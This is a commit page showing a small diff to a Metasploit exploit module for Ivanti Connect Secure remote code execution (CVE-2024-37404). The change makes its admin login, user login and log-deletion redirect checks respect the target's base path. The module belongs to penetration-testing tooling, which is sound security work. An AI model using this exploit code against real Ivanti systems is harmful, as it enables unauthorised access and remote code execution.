adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions 9 Packages Projects Releases Wiki Activity

Use TARGET_URI when checking the redirection URI

Browse Source
This commit is contained in:
Christophe De La Fuente
2024-12-02 16:45:12 +01:00
parent 3dcb9d58ab
commit a46b2f437f
1 changed files with 7 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_37404.rb
+7 -7
View File
@@ -130,12 +130,12 @@ class MetasploitModule < Msf::Exploit::Remote
)
raise IvantiUnknownError, "[login_admin] No response from '#{uri}'" if res.nil?
if res.code == 302 && res.redirection.to_s == '/dana-na/auth/url_admin/welcome.cgi?p=admin%2Dconfirm'
if res.code == 302 && res.redirection.to_s == normalize_uri(target_uri.path, '/dana-na/auth/url_admin/welcome.cgi?p=admin%2Dconfirm')
print_warning("The admin #{datastore['ADMIN_USERNAME']} is already logged in")
res = confirm_login_admin(res.redirection.to_s)
res = confirm_login_admin(normalize_uri(target_uri.path, res.redirection.to_s))
end
if res.code != 302 || res.redirection.to_s != '/dana-admin/misc/admin.cgi'
if res.code != 302 || res.redirection.to_s != normalize_uri(target_uri.path, '/dana-admin/misc/admin.cgi')
raise IvantiNoAccessError, "[login_admin] Login failed (username: #{datastore['ADMIN_USERNAME']}, password: #{datastore['ADMIN_PASSWORD']})"
end
end
@@ -224,12 +224,12 @@ class MetasploitModule < Msf::Exploit::Remote
)
raise IvantiUnknownError, "[login_user] No response from '#{uri}'" if res.nil?
if res.code == 302 && res.redirection.to_s == '/dana-na/auth/url_default/welcome.cgi?p=user%2Dconfirm'
if res.code == 302 && res.redirection.to_s == normalize_uri(target_uri.path, '/dana-na/auth/url_default/welcome.cgi?p=user%2Dconfirm')
print_warning("User #{datastore['USERNAME']} is already logged in.")
res = confirm_login_user(res.redirection.to_s)
res = confirm_login_user(normalize_uri(target_uri.path, res.redirection.to_s))
end
if res.code != 302 && res.redirection.to_s != '/dana/home/starter0.cgi?check=yes'
if res.code != 302 && res.redirection.to_s != normalize_uri(target_uri.path, '/dana/home/starter0.cgi?check=yes')
raise IvantiNoAccessError, "[login_user] Login failed (username: #{datastore['USERNAME']}, password: #{datastore['PASSWORD']})"
end
end
@@ -402,7 +402,7 @@ class MetasploitModule < Msf::Exploit::Remote
)
raise IvantiUnknownError, "[delete_log_file] No response from '#{uri}'" if res.nil?
if res.code != 302 || res.redirection.to_s != '/dana-admin/auth/uploadedlogs.cgi'
if res.code != 302 || res.redirection.to_s != normalize_uri(target_uri.path, '/dana-admin/auth/uploadedlogs.cgi')
raise IvantiUnexpectedResponseError, "[delete_log_file] Unable to delete the log file (status code=#{res.code})"
end